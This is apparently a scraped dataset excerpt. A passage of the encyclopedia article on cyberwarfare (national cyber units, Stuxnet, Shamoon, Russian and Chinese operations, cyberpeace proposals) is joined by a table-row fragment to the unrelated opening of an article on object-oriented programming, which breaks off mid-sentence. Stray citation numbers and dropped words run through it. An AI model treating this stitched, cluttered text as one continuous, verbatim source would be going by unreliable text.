conducted a yearly war game called Locked Shields since 2010 designed to test readiness and improve skills, strategy tactics and operational decision making of participating national organizations. 96 97 Locked Shields 2019 saw 1200 participants from 30 countries compete in a red team vs. blue team exercise. The war game involved a fictional country, Berylia, which was "experiencing a deteriorating security situation, where a number of hostile events coincide with coordinated cyber attacks against a major civilian internet service provider and maritime surveillance system. The attacks caused severe disruptions in the power generation and distribution, 4G communication systems, maritime surveillance, water purification plant and other critical infrastructure components". CCDCE describe the aim of the exercise was to "maintain the operation of various systems under intense pressure, the strategic part addresses the capability to understand the impact of decisions made at the strategic and policy level. 96 98 Ultimately, France was the winner of Locked Shields 2019. 99 The European Union conducts cyber war game scenarios with member states and foreign partner states to improve readiness, skills and observe how strategic and tactical decisions may affect the scenario. 100 As well as war games which serve a broader purpose to explore options and improve skills, cyber war games are targeted at preparing for specific threats. In 2018 the Sunday Times reported the UK government was conducting cyber war games which could "blackout Moscow". 101 102 These types of war games move beyond defensive preparedness, as previously described above and onto preparing offensive capabilities which can be used as deterrence, or for "war". 103 Approximately 120 countries have been developing ways to use the Internet as a weapon and target financial markets, government computer systems and utilities. 104 According to Fritz, China has expanded its cyber capabilities and military technology by acquiring foreign military technology. 105 Fritz states that the Chinese government uses "new space-based surveillance and intelligence gathering systems, Anti-satellite weapon, anti-radar, infrared decoys, and false target generators" to assist in this quest, and that they support their "Informatisation" of their military through "increased education of soldiers in cyber warfare; improving the information network for military training, and has built more virtual laboratories, digital libraries and digital campuses. 105 Through this informatisation, they hope to prepare their forces to engage in a different kind of warfare, against technically capable adversaries. 106 Foreign Policy magazine put the size of China's "hacker army" at anywhere from 50,000 to 100,000 individuals. 107 Diplomatic cables highlight US concerns that China is using access to Microsoft source code and 'harvesting the talents of its private sector' to boost its offensive and defensive capabilities. 108 While China continues to be held responsible for a string of cyber-attacks on a number of public and private institutions in the United States, India, Russia, Canada, and France, the Chinese government denies any involvement in cyber-spying campaigns. The administration maintains the position that China is also victim to an increasing number of cyber-attacks. Most reports about China's cyber warfare capabilities have yet to be confirmed by the Chinese government. 109 In June 2015, the United States Office of Personnel Management (OPM) announced that it had been the target of a data breach targeting the records of as many as four million people. 110 Later, FBI Director James Comey put the number at 18 million. 111 The Washington Post has reported that the attack originated in China, citing unnamed government officials. 112 Operation Shady RAT is a series of cyber attacks starting mid 2006, reported by Internet security company McAfee in August 2011. China is widely believed to be the state actor behind these attacks which hit at least 72 organizations including governments and defense contractors. 113 The 2018 cyberattack on the Marriott hotel chain 114 115 that collected personal details of roughly 500 million guests is now known to be a part of a Chinese intelligence-gathering effort that also hacked health insurers and the security clearance files of millions more Americans, The hackers, are suspected of working on behalf of the Ministry of State Security (MSS), the country's Communist-controlled civilian spy agency. 116 117 118 On 14 September 2020, a database showing personal details of about 2.4 million people around the world was leaked and published. A Chinese company, Zhenhua Data compiled the database. 119 According to the information from "National Enterprise Credit Information Publicity System", which is run by State Administration for Market Regulation in China, the shareholders of Zhenhua Data Information Technology Co., Ltd. are two natural persons and one general partnership enterprise whose partners are natural persons. 120 Wang Xuefeng, who is the chief executive and the shareholder of Zhenhua Data, has publicly boasted that he supports "hybrid warfare" through manipulation of public opinion and "psychological warfare". 121 In February 2024 The Philippines announced that it had successfully fought off a cyber attack which was traced to hackers in China. Several government websites were targeted including the National coast watch and personal website of the president of the Philippines, Ferdinand Marcos Jr. 122 In May 2024 The UK announced that it had taken a database offline that is used by its defense ministry after coming under a cyber attack attributed to the Chinese state. 123 The Department of Information Technology created the Indian Computer Emergency Response Team (CERT-In) in 2004 to thwart cyber attacks in India. 124 That year, there were 23 reported cyber security breaches. In 2011, there were 13,301. That year, the government created a new subdivision, the National Critical Information Infrastructure Protection Centre (NCIIPC) to thwart attacks against energy, transport, banking, telecom, defense, space and other sensitive areas. 125 The executive director of the Nuclear Power Corporation of India (NPCIL) stated in February 2013 that his company alone was forced to block up to ten targeted attacks a day. CERT-In was left to protect less critical sectors. 126 A high-profile cyber attack on 12 July 2012 breached the email accounts of about 12,000 people, including those of officials from the Ministry of External Affairs, Ministry of Home Affairs, Defense Research and Development Organizations (DRDO), and the Indo-Tibetan Border Police (ITBP). 124 A government-private sector plan being overseen by National Security Advisor (NSA) Shivshankar Menon began in October 2012, and intends to boost up India's cyber security capabilities in the light of a group of experts findings that India faces a 470,000 shortfall of such experts despite the country's reputation of being an IT and software powerhouse. 127 In February 2013, Information Technology Secretary J. Satyanarayana stated that the NCIIPC page needed was finalizing policies related to national cyber security that would focus on domestic security solutions, reducing exposure through foreign technology. 124 Other steps include the isolation of various security agencies to ensure that a synchronised attack could not succeed on all fronts and the planned appointment of a National Cyber Security Coordinator. As of that month, there had been no significant economic or physical damage to India related to cyber attacks. On 26 November 2010, a group calling itself the Indian Cyber Army hacked the websites belonging to the Pakistan Army and the others belong to different ministries, including the Ministry of Foreign Affairs, Ministry of Education, Ministry of Finance, Pakistan Computer Bureau, Council of Islamic Ideology, etc. The attack was done as a revenge for the Mumbai terrorist attacks. 128 On 4 December 2010, a group calling itself the Pakistan Cyber Army hacked the website of India's top investigating agency, the Central Bureau of Investigation (CBI). The National Informatics Center (NIC) has begun an inquiry. 129 In July 2016, Cymmetria researchers discovered and revealed the cyber attack dubbed 'Patchwork', which compromised an estimated 2500 corporate and government agencies using code stolen from GitHub and the dark web. Examples of weapons used are an exploit for the Sandworm vulnerability (CVE 2014 4114), a compiled AutoIt script, and UAC bypass code dubbed UACME. Targets are believed to be mainly military and political assignments around Southeast Asia and the South China Sea and the attackers are believed to be of Indian origin and gathering intelligence from influential parties. 130 131 The Defence Cyber Agency, which is the Indian Military agency responsible for Cyberwarfare, is expected to become operational by November 2019. 132 The Chinese are being blamed after a cybersecurity company, F-Secure Labs, found a malware, NanHaiShu, which targeted the Philippines Department of Justice. It sent information in an infected machine to a server with a Chinese IP address. The malware which is considered particularly sophisticated in nature was introduced by phishing emails that were designed to look like they were coming from an authentic sources. The information sent is believed to be relating to the South China Sea legal case. 133 In July 2009, there were a series of coordinated denial of service attacks against major government, news media, and financial websites in South Korea and the United States. 134 While many thought the attack was directed by North Korea, one researcher traced the attacks to the United Kingdom. 135 Security researcher Chris Kubecka presented evidence multiple European Union and United Kingdom companies unwittingly helped attack South Korea due to a W32.Dozer infections, malware used in part of the attack. Some of the companies used in the attack were partially owned by several governments, further complicating cyber attribution. 136 In July 2011, the South Korean company SK Communications was hacked, resulting in the theft of the personal details (including names, phone numbers, home and email addresses and resident registration numbers) of up to 35 million people. A trojaned software update was used to gain access to the SK Communications network. Links exist between this hack and other malicious activity and it is believed to be part of a broader, concerted hacking effort. 137 With ongoing tensions on the Korean Peninsula, South Korea's defense ministry stated that South Korea was going to improve cyber-defense strategies in hopes of preparing itself from possible cyber attacks. In March 2013, South Korea's major banks Shinhan Bank, Woori Bank and NongHyup Bank as well as many broadcasting stations KBS, YTN and MBC were hacked and more than 30,000 computers were affected; it is one of the biggest attacks South Korea has faced in years. 138 Although it remains uncertain as to who was involved in this incident, there has been immediate assertions that North Korea is connected, as it threatened to attack South Korea's government institutions, major national banks and traditional newspapers numerous times in reaction to the sanctions it received from nuclear testing and to the continuation of Foal Eagle, South Korea's annual joint military exercise with the United States. North Korea's cyber warfare capabilities raise the alarm for South Korea, as North Korea is increasing its manpower through military academies specializing in hacking. Current figures state that South Korea only has 400 units of specialized personnel, while North Korea has more than 3,000 highly trained hackers; this portrays a huge gap in cyber warfare capabilities and sends a message to South Korea that it has to step up and strengthen its Cyber Warfare Command forces. Therefore, in order to be prepared from future attacks, South Korea and the United States will discuss further about deterrence plans at the Security Consultative Meeting (SCM). At SCM, they plan on developing strategies that focuses on accelerating the deployment of ballistic missiles as well as fostering its defense shield program, known as the Korean Air and Missile Defense. 139 In an extension of a bilateral dispute between Ethiopia and Egypt over the Grand Ethiopian Renaissance Dam, Ethiopian government websites have been hacked by the Egypt-based hackers in June 2020. 140 141 The New York Times published an expos revealing an extensive three-year phishing campaign aimed against diplomats based in Cyprus. After accessing the state system the hackers had access to the European Union's entire exchange database. 142 By login into Coreu, hackers accessed communications linking all EU states, on both sensitive and not so sensitive matters. The event exposed poor protection of routine exchanges among European Union officials and a coordinated effort from a foreign entity to spy on another country. "After over a decade of experience countering Chinese cyberoperations and extensive technical analysis, there is no doubt this campaign is connected to the Chinese government", said Blake Darche, one of the Area 1 Security experts the company revealing the stolen documents. The Chinese Embassy in the US did not return calls for comment. 143 In 2019, another coordinated effort took place that allowed hackers to gain access to government (gov.cy) emails. Cisco's Talos Security Department revealed that "Sea Turtle" hackers carried out a broad piracy campaign in the DNS countries, hitting 40 different organizations, including Cyprus. 144 In April 2007, Estonia came under cyber attack in the wake of relocation of the Bronze Soldier of Tallinn. 145 The largest part of the attacks were coming from Russia and from official servers of the authorities of Russia. 146 In the attack, ministries, banks, and media were targeted. 147 148 This attack on Estonia, a seemingly small Baltic state, was so effective because of how most of Estonian government services are run online. Estonia has implemented an e-government, where banking services, political elections, taxes, and other components of a modern society are now all done online. 149 In 2013, the French Minister of Defense, Mr Jean-Yves Le Drian, ordered the creation of a cyber army, representing its fourth national army corps 150 (along with ground, naval and air forces) under the French Ministry of Defense, to protect French and European interests on its soil and abroad. 151 A contract was made with French firm EADS (Airbus) to identify and secure its main elements susceptible to cyber threats. 152 In 2016 France had planned 2600 "cyber-soldiers" and a 440 million euros investment for cybersecurity products for this new army corps. 153 An additional 4400 reservists constitute the heart of this army from 2019. 154 In 2013, Germany revealed the existence of their 60 person Computer Network Operation unit. 155 The German intelligence agency, BND, announced it was seeking to hire 130 "hackers" for a new "cyber defence station" unit. In March 2013, BND president Gerhard Schindler announced that his agency had observed up to five attacks a day on government authorities, thought mainly to originate in China. He confirmed the attackers had so far only accessed data and expressed concern that the stolen information could be used as the basis of future sabotage attacks against arms manufacturers, telecommunications companies and government and military agencies. 156 Shortly after Edward Snowden leaked details of the U.S. National Security Agency's cyber surveillance system, German Interior Minister Hans-Peter Friedrich announced that the BND would be given an additional budget of 100 million Euros to increase their cyber surveillance capability from 5% of total internet traffic in Germany to 20% of total traffic, the maximum amount allowed by German law. 157 In the Netherlands, Cyber Defense is nationally coordinated by the National Cyber Security Centrum nl (NCSC). 158 The Dutch Ministry of Defense laid out a cyber strategy in 2011. 159 The first focus is to improve the cyber defense handled by the Joint IT branch (JIVC). To improve intel operations, the intel community in the Netherlands (including the military intel organization, MIVD) has set up the Joint Sigint Cyber Unit (JSCU). The Ministry of Defense oversees an offensive cyber force, called Defensive Cyber Command (DCC). 160 It has been claimed that Russian security services organized a number of denial of service attacks as a part of their cyber-warfare against other countries, 161 most notably the 2007 cyberattacks on Estonia and the 2008 cyberattacks on Russia, South Ossetia, Georgia, and Azerbaijan. 162 One identified young Russian hacker said that he was paid by Russian state security services to lead hacking attacks on NATO computers. He was studying computer sciences at the Department of the Defense of Information. His tuition was paid for by the FSB. 163 Russian, South Ossetian, Georgian and Azerbaijani sites were attacked by hackers during the 2008 South Ossetia War. 164 In October 2016, Jeh Johnson the United States Secretary of Homeland Security and James Clapper the U.S. Director of National Intelligence issued a joint statement accusing Russia of interfering with the 2016 United States presidential election. 165 The New York Times reported the Obama administration formally accused Russia of stealing and disclosing Democratic National Committee emails. 166 Under U.S. law (50 U.S.C.Title 50 War and National Defense, Chapter 15 National Security, Subchapter III Accountability for Intelligence Activities 167 ) there must be a formal Presidential finding prior to authorizing a covert attack. Then U.S. vice president Joe Biden said on the American news interview program Meet The Press that the United States will respond. 168 The New York Times noted that Biden's comment "seems to suggest that Mr. Obama is prepared to order or has already ordered some kind of covert action". 169 In January 2017, Sweden's armed forces were subjected to a cyber-attack that caused them to shutdown a so-called Caxcis IT system used in military exercises. 170 According to CrowdStrike from 2014 to 2016, the Russian APT Fancy Bear used Android malware to target the Ukrainian Army's Rocket Forces and Artillery. They distributed an infected version of an Android app whose original purpose was to control targeting data for the D 30 Howitzer artillery. The app, used by Ukrainian officers, was loaded with the X-Agent spyware and posted online on military forums. The attack was claimed by Crowd-Strike to be successful, with more than 80% of Ukrainian D 30 Howitzers destroyed, the highest percentage loss of any artillery pieces in the army (a percentage that had never been previously reported and would mean the loss of nearly the entire arsenal of the biggest artillery piece of the Ukrainian Armed Forces 171 ). 172 According to the Ukrainian army this number is incorrect and that losses in artillery weapons "were way below those reported" and that these losses "have nothing to do with the stated cause". 173 In 2014, the Russians were suspected to use a cyber weapon called "Snake", or "Ouroboros, to conduct a cyber attack on Ukraine during a period of political turmoil. The Snake tool kit began spreading into Ukrainian computer systems in 2010. It performed Computer Network Exploitation (CNE), as well as highly sophisticated Computer Network Attacks (CNA). 174 On 23 December 2015 the Black-Energy malware was used in a cyberattack on Ukraine's power-grid that left more than 200,000 people temporarily without power. A mining company and a large railway operator were also victims of the attack. 175 Ukraine saw a massive surge in cyber attacks during the 2022 Russian invasion of Ukraine. Several websites belonging to Ukrainian banks and government departments became inaccessible. 176 MI6 reportedly infiltrated an Al Qaeda website and replaced the instructions for making a pipe bomb with the recipe for making cupcakes. 177 In October 2010, Iain Lobban, the director of the Government Communications Headquarters (GCHQ), said the UK faces a "real and credible" threat from cyber attacks by hostile states and criminals and government systems are targeted 1,000 times each month, such attacks threatened the UK's economic future, and some countries were already using cyber assaults to put pressure on other nations. 178 On 12 November 2013, financial organizations in London conducted cyber war games dubbed "Waking Shark 2" 179 to simulate massive internet-based attacks against bank and other financial organizations. The Waking Shark 2 cyber war games followed a similar exercise in Wall Street. 180 Iran has been both victim and perpetrator of several cyberwarfare operations. Iran is considered an emerging military power in the field. 181 In September 2010, Iran was attacked by the Stuxnet worm, thought to specifically target its Natanz nuclear enrichment facility. It was a 500 kilobyte computer worm that infected at least 14 industrial sites in Iran, including the Natanz uranium-enrichment plant. Although the official authors of Stuxnet haven't been officially identified, Stuxnet is believed to be developed and deployed by the United States and Israel. 182 The worm is said to be the most advanced piece of malware ever discovered and significantly increases the profile of cyberwarfare. 183 184 Iranian Cyber Police department, FATA, was dismissed one year after its creation in 2011 because of the arrest and death of Sattar Behesti, a blogger, in the custody of FATA. Since then, the main responsible institution for the cyberwarfare in Iran is the "Cyber Defense Command" operating under the Joint Staff of Iranian Armed Forces. The Iranian state sponsored group MuddyWater is active since at least 2017 and is responsible for many cyber attacks on various sectors. 185 In the 2006 war against Hezbollah, Israel alleges that cyber-warfare was part of the conflict, where the Israel Defense Forces (IDF) intelligence estimates several countries in the Middle East used Russian hackers and scientists to operate on their behalf. As a result, Israel attached growing importance to cyber-tactics, and became, along with the U.S., France and a couple of other nations, involved in cyber-war planning. Many international high-tech companies are now locating research and development operations in Israel, where local hires are often veterans of the IDF's elite computer units. 186 Richard A. Clarke adds that "our Israeli friends have learned a thing or two from the programs we have been working on for more than two decades. 14 : 8 In September 2007, Israel carried out an airstrike on a suspected nuclear reactor 187 in Syria dubbed Operation Orchard. U.S. industry and military sources speculated that the Israelis may have used cyberwarfare to allow their planes to pass undetected by radar into Syria. 188 189 Following US President Donald Trump's decision to pull out of the Iran nuclear deal in May 2018, cyber warfare units in the United States and Israel monitoring internet traffic out of Iran noted a surge in retaliatory cyber attacks from Iran. Security firms warned that Iranian hackers were sending emails containing malware to diplomats who work in the foreign affairs offices of US allies and employees at telecommunications companies, trying to infiltrate their computer systems. 190 On 15 August 2012 at 11:08 am local time, the Shamoon virus began destroying over 35,000 computer systems, rendering them inoperable. The virus used to target the Saudi government by causing destruction to the state owned national oil company Saudi Aramco. The attackers posted a pastie on PasteBin.com hours prior to the wiper logic bomb occurring, citing oppression and the Al-Saud regime as a reason behind the attack. 191 The attack was well staged according to Chris Kubecka, a former security advisor to Saudi Aramco after the attack and group leader of security for Aramco Overseas. 192 It was an unnamed Saudi Aramco employee on the Information Technology team which opened a malicious phishing email, allowing initial entry into the computer network around mid 2012. 193 Kubecka also detailed in her Black Hat USA talk Saudi Aramco placed the majority of their security budget on the ICS control network, leaving the business network at risk for a major incident. "When you realize most of your security budget was spent on ICS IT gets Pwnd". 193 The virus has been noted to have behavior differing from other malware attacks, due to the destructive nature and the cost of the attack and recovery. US Defense Secretary Leon Panetta called the attack a "Cyber Pearl Harbor". 194 Known years later as the "Biggest hack in history" and intended for cyber warfare. 195 Shamoon can spread from an infected machine to other computers on the network. Once a system is infected, the virus continues to compile a list of files from specific locations on the system, upload them to the attacker, and erase them. Finally the virus overwrites the master boot record of the infected computer, making it unusable. 196 197 The virus has been used for cyber warfare against the national oil companies Saudi Aramco and Qatar's RasGas. 198 199 196 200 Saudi Aramco announced the attack on their Facebook page and went offline again until a company statement was issued on 25 August 2012. The statement falsely reported normal business was resumed on 25 August 2012. However a Middle Eastern journalist leaked photographs taken on 1 September 2012 showing kilometers of petrol trucks unable to be loaded due to backed business systems still inoperable. On 29 August 2012 the same attackers behind Shamoon posted another pastie on PasteBin.com, taunting Saudi Aramco with proof they still retained access to the company network. The post contained the username and password on security and network equipment and the new password for the CEO Khalid Al- Falih 201 The attackers also referenced a portion of the Shamoon malware as further proof in the pastie. 202 According to Kubecka, in order to restore operations. Saudi Aramco used its large private fleet of aircraft and available funds to purchase much of the world's hard drives, driving the price up. New hard drives were required as quickly as possible so oil prices were not affected by speculation. By 1 September 2012 gasoline resources were dwindling for the public of Saudi Arabia 17 days after the 15 August attack. RasGas was also affected by a different variant, crippling them in a similar manner. 203 In March 2018 American Republican fundraiser Elliott Broidy filed a lawsuit against Qatar, alleging that Qatar's government stole and leaked his emails in order to discredit him because he was viewed "as an impediment to their plan to improve the country's standing in Washington. 204 In May 2018, the lawsuit named Mohammed bin Hamad bin Khalifa Al Thani, brother of the Emir of Qatar, and his associate Ahmed Al-Rumaihi, as allegedly orchestrating Qatar's cyber warfare campaign against Broidy. 205 Further litigation revealed that the same cybercriminals who targeted Broidy had targeted as many as 1,200 other individuals, some of whom are also "well-known enemies of Qatar" such as senior officials of the U.A.E., Egypt, Saudi Arabia, and Bahrain. While these hackers almost always obscured their location, some of their activity was traced to a telecommunication network in Qatar. 206 The United Arab Emirates has launched several cyber-attacks in the past targeting dissidents. Ahmed Mansoor, an Emirati citizen, was jailed for sharing his thoughts on Facebook and Twitter. 207 He was given the code name Egret under the state-led covert project called Raven, which spied on top political opponents, dissidents, and journalists. Project Raven deployed a secret hacking tool called Karma, to spy without requiring the target to engage with any web links. 208 In September 2021, three of the former American intelligence officers, Marc Baier, Ryan Adams, and Daniel Gericke, admitted to assisting the UAE in hacking crimes by providing them with advanced technology and violating US laws. Under a three-year deferred prosecution agreement with the Justice Department, the three defendants also agreed to pay nearly $1.7 million in fines to evade prison sentences. The court documents revealed that the Emirates hacked into the computers and mobile phones of dissidents, activists, and journalists. They also attempted to break into the systems of the US and rest of the world. 209 Cyberwarfare in the United States is a part of the American military strategy of proactive cyber defence and the use of cyberwarfare as a platform for attack. 210 The new United States military strategy makes explicit that a cyberattack is casus belli just as a traditional act of war. 211 U.S. government security expert Richard A. Clarke, in his book Cyber War (May 2010), had defined "cyberwarfare" as "actions by a nation-state to penetrate another nation's computers or networks for the purposes of causing damage or disruption. 14 : 6 The Economist describes cyberspace as "the fifth domain of warfare, 212 and William J. Lynn, U.S. Deputy Secretary of Defense, states that "as a doctrinal matter, the Pentagon has formally recognized cyberspace as a new domain in warfare . . . which has become just as critical to military operations as land, sea, air, and space. 213 When Russia was still a part of the Soviet Union in 1982, a portion of a Trans-Siberia pipeline within its territory exploded, 214 allegedly due to a Trojan Horse computer malware implanted in the pirated Canadian software by the Central Intelligence Agency. The malware caused the SCADA system running the pipeline to malfunction. The "Farewell Dossier" provided information on this attack, and wrote that compromised computer chips would become a part of Soviet military equipment, flawed turbines would be placed in the gas pipeline, and defective plans would disrupt the output of chemical plants and a tractor factory. This caused the "most monumental nonnuclear explosion and fire ever seen from space. However, the Soviet Union did not blame the United States for the attack. 215 In 2009, president Barack Obama declared America's digital infrastructure to be a "strategic national asset, and in May 2010 the Pentagon set up its new U.S. Cyber Command (USCYBERCOM), headed by General Keith B. Alexander, director of the National Security Agency (NSA), to defend American military networks and attack other countries' systems. The EU has set up ENISA (European Union Agency for Network and Information Security) which is headed by Prof. Udo Helmbrecht and there are now further plans to significantly expand ENISA's capabilities. The United Kingdom has also set up a cyber-security and "operations centre" based in Government Communications Headquarters (GCHQ), the British equivalent of the NSA. In the U.S. however, Cyber Command is only set up to protect the military, whereas the government and corporate infrastructures are primarily the responsibility respectively of the Department of Homeland Security and private companies. 212 On 19 June 2010, United States Senator Joe Lieberman (I-CT) introduced a bill called "Protecting Cyberspace as a National Asset Act of 2010", 216 which he co-wrote with Senator Susan Collins (R-ME) and Senator Thomas Carper (D-DE). If signed into law, this controversial bill, which the American media dubbed the "Kill switch bill", would grant the president emergency powers over parts of the Internet. However, all three co-authors of the bill issued a statement that instead, the bill narrowed existing broad presidential authority to take over telecommunications networks". 217 In August 2010, the U.S. for the first time warned publicly about the Chinese military's use of civilian computer experts in clandestine cyber attacks aimed at American companies and government agencies. The Pentagon also pointed to an alleged China-based computer spying network dubbed GhostNet which was revealed in a 2009 research report. 218 219 On 6 October 2011, it was announced that Creech AFB's drone and Predator fleet's command and control data stream had been keylogged, resisting all attempts to reverse the exploit, for the past two weeks. 220 The Air Force issued a statement that the virus had "posed no threat to our operational mission". 221 On 21 November 2011, it was widely reported in the U.S. media that a hacker had destroyed a water pump at the Curran-Gardner Township Public Water District in Illinois. 222 However, it later turned out that this information was not only false, but had been inappropriately leaked from the Illinois Statewide Terrorism and Intelligence Center. 223 In June 2012 the New York Times reported that president Obama had ordered the cyber attack on Iranian nuclear enrichment facilities. 224 In August 2012, USA Today reported that the US conducted cyberattacks for tactical advantage in Afghanistan. 225 According to a 2013 Foreign Policy magazine article, NSA's Tailored Access Operations (TAO) unit "has successfully penetrated Chinese computer and telecommunications systems for almost 15 years, generating some of the best and most reliable intelligence information about what is going on inside the People's Republic of China. 226 227 In 2014, Barack Obama ordered an intensification of cyberwarfare against North Korea's missile program for sabotaging test launches in their opening seconds. 228 On 24 November 2014, Sony Pictures Entertainment hack was a release of confidential data belonging to Sony Pictures Entertainment (SPE). In 2016 President Barack Obama authorized the planting of cyber weapons in Russian infrastructure in the final weeks of his presidency in response to Moscow's interference in the 2016 presidential election. 229 On 29 December 2016 United States imposed the most extensive sanctions against Russia since the Cold War, 230 expelling 35 Russian diplomats from the United States. 231 232 Economic sanctions are the most frequently used the foreign policy instruments by the United States today 233 Thus, it is not surprising to see that economic sanctions are also used as counter policies against cyberattacks. According to Onder (2021), economic sanctions are also information gathering mechanisms for the sanctioning states about the capabilities of the sanctioned states. 234 In March 2017, WikiLeaks published more than 8,000 documents on the CIA. The confidential documents, codenamed Vault 7 and dated from 2013 to 2016, include details on CIA's software capabilities, such as the ability to compromise cars, smart TVs, 235 web browsers (including Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera Software ASA), 236 237 238 and the operating systems of most smartphones (including Apple's iOS and Google's Android), as well as other operating systems such as Microsoft Windows, macOS, and Linux. 239 In June 2019, the New York Times reported that American hackers from the United States Cyber Command planted malware potentially capable of disrupting the Russian electrical grid. 61 The United States topped the world in terms of cyberwarfare intent and capability, according to Harvard University's Belfer Center Cyber 2022 Power Index, above China, Russia, the United Kingdom and Australia. 240 In June 2023, the National Security Agency and Apple were accused by the Russian Federal Security Service (FSB) of compromising thousands of iPhones, including those of diplomats from China, Israel, NATO members, and Syria. Kaspersky Lab said many of its senior staff and managers were also hit by the ongoing attack, which it first suspected in early 2023. The oldest traces of infiltration date back to 2019. Kaspersky Lab said it had not shared the findings with Russian authorities until the FSB announcement. 240 A cyber mercenary is a non-state actor that carries out cyber attacks for Nation states for hire. State actors can use the cyber mercenaries as a front to try and distance themselves from the attack with plausible deniability. 241 The rise of cyber as a warfighting domain has led to efforts to determine how cyberspace can be used to foster peace. For example, the German civil rights panel FIfF runs a campaign for cyberpeace for the control of cyberweapons and surveillance technology and against the militarization of cyberspace and the development and stockpiling of offensive exploits and malware. 242 Measures for cyberpeace include policymakers developing new rules and norms for warfare, individuals and organizations building new tools and secure infrastructures, promoting open source, the establishment of cyber security centers, auditing of critical infrastructure cybersecurity, obligations to disclose vulnerabilities, disarmament, defensive security strategies, decentralization, education and widely applying relevant tools and infrastructures, encryption and other cyberdefenses. 242 243 The topics of cyber peacekeeping 244 245 and cyber peacemaking 246 have also been studied by researchers, as a way to restore and strengthen peace in the aftermath of both cyber and traditional warfare. 247 Cyber counter-intelligence are measures to identify, penetrate, or neutralize foreign operations that use cyber means as the primary tradecraft methodology, as well as foreign intelligence service collection efforts that use traditional methods to gauge cyber capabilities and intentions. 248 One of the hardest issues in cyber counterintelligence is the problem of cyber attribution. Unlike conventional warfare, figuring out who is behind an attack can be very difficult. 255 In October 2011 the Journal of Strategic Studies, a leading journal in that field, published an article by Thomas Rid, "Cyber War Will Not Take Place" which argued that all politically motivated cyber attacks are merely sophisticated versions of sabotage, espionage, or subversion and that it is unlikely that cyber war will occur in the future. 256 NIST, a cybersecurity framework, was published in 2014 in the US. 257 The Tallinn Manual, published in 2013, is an academic, non-binding study on how international law, in particular the jus ad bellum and international humanitarian law, apply to cyber conflicts and cyber warfare. It was written at the invitation of the Tallinn-based NATO Cooperative Cyber Defence Centre of Excellence by an international group of approximately twenty experts between 2009 and 2012. 258 The Shanghai Cooperation Organisation (members of which include China and Russia) defines cyberwar to include dissemination of information "harmful to the spiritual, moral and cultural spheres of other states". In September 2011, these countries proposed to the UN Secretary General a document called "International code of conduct for information security". 259 In contrast, the United approach focuses on physical and economic damage and injury, putting political concerns under freedom of speech. This difference of opinion has led to reluctance in the West to pursue global cyber arms control agreements. 260 However, American General Keith B. Alexander did endorse talks with Russia over a proposal to limit military attacks in cyberspace. 261 In June 2013, Barack Obama and Vladimir Putin agreed to install a secure Cyberwar-Hotline providing "a direct secure voice communications line between the US cybersecurity coordinator and the Russian deputy secretary of the security council, should there be a need to directly manage a crisis situation arising from an ICT security incident" (White House quote). 262 A Ukrainian international law scholar, Alexander Merezhko, has developed a project called the International Convention on Prohibition of Cyberwar in Internet. According to this project, cyberwar is defined as the use of Internet and related technological means by one state against the political, economic, technological and information sovereignty and independence of another state. Professor Merezhko's project suggests that the Internet ought to remain free from warfare tactics and be treated as an international landmark. He states that the Internet (cyberspace) is a "common heritage of mankind". 263 On the February 2017 RSA Conference Microsoft president Brad Smith suggested global rules a "Digital Geneva Convention" for cyber attacks that "ban the nation-state hacking of all the civilian aspects of our economic and political infrastructures". He also stated that an independent organization could investigate and publicly disclose evidence that attributes nation-state attacks to specific countries. Furthermore, he said that the technology sector should collectively and neutrally work together to protect Internet users and pledge to remain neutral in conflict and not aid governments in offensive activity and to adopt a coordinated disclosure process for software and hardware vulnerabilities. 264 265 A fact-binding body has also been proposed to regulate cyber operations. 266 267 |
639 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Object-oriented_programming | Object-oriented programming (OOP) is a programming paradigm based on the concept of objects, 1 which can contain data and code: data in the form of fields (often known as attributes or properties), and code in the form of procedures (often known as methods). In OOP, computer programs are designed by making them out of objects that interact with one another. 2 3 Many of the most widely used programming languages (such as C , Java, 4 Python, etc.) are multi-paradigm and they support object-oriented programming to a greater or lesser degree, typically in combination with imperative programming, procedural programming and functional programming. Significant object-oriented languages include Ada, ActionScript, C , Common Lisp, C , Dart, Eiffel, Fortran 2003, Haxe, Java, 4 Kotlin, Logo, MATLAB, Objective-C, Object Pascal, Perl, PHP, Python, R, Raku, Ruby, Scala, SIMSCRIPT, Simula, Smalltalk, Swift, Vala and Visual Basic.NET. Terminology invoking "objects" in the modern sense of object-oriented programming made its first appearance at the artificial intelligence group at MIT in the late 1950s and early 1960s. "Object" referred to LISP atoms with identified properties (attributes). 5 6 Another early MIT example was Sketchpad created by Ivan Sutherland in 1960 1961; in the glossary of the 1963 technical report based on his dissertation about Sketchpad, Sutherland defined notions of "object" and "instance" (with the class concept covered by "master" or "definition"), albeit specialized to graphical interaction. 7 Also, in 1968, an MIT ALGOL version, AED 0, established a direct link between data structures ("plexes", in that dialect) and procedures, prefiguring what were later termed "messages", "methods", and "member functions". 8 9 Topics such as data abstraction and modular programming were common points of discussion at this time. Independently of later MIT work such as AED, Simula was developed during the years 1961 1967. 8 Simula introduced important concepts that are today an essential part of object-oriented programming, such as class and object, inheritance, and dynamic binding. 10 The object-oriented Simula programming language was used mainly by researchers involved with physical modelling, such as models to study and improve the movement of ships and their content through cargo ports. 10 I thought of objects being like biological cells and or individual computers on a network, only able to communicate with messages (so messaging came at the very beginning it took a while to see how to do messaging in a programming language efficiently enough to be useful). Alan Kay, 1 Influenced by the work at MIT and the Simula language, in November 1966 Alan Kay began working on ideas that would eventually be incorporated into the Smalltalk programming language. Kay used the term "object-oriented programming" in conversation as early as 1967. 1 Although sometimes called "the father of object-oriented programming", 11 Alan Kay has differentiated his notion of OO from the more conventional abstract data type notion of object, and has implied that the computer science establishment did not adopt his notion. 1 A 1976 MIT memo co-authored by Barbara Liskov lists Simula 67, CLU, and Alphard as object-oriented languages, but does not mention Smalltalk. 12 In the 1970s, the first version of the Smalltalk programming language was developed at Xerox PARC by Alan Kay, Dan Ingalls and Adele Goldberg. Smalltalk 72 included a programming environment and was dynamically typed, and at first was interpreted, not compiled. Smalltalk became noted for its application of object orientation at the language-level and its graphical development environment. Smalltalk went through various versions and interest in the language grew. 13 While Smalltalk was influenced by the ideas introduced in Simula 67 it was designed to be a fully dynamic system in which classes could be created and modified dynamically. 14 During the late 1970s and 1980s, object-oriented programming rose to prominence. The Flavors object-oriented Lisp was developed starting 1979, introducing multiple inheritance and mixins. 15 In 1981, Goldberg edited the August issue of Byte Magazine, introducing Smalltalk and object-oriented programming to a wide audience. 16 LOOPS, the object system for Interlisp-D, was influenced by Smalltalk and Flavors, and 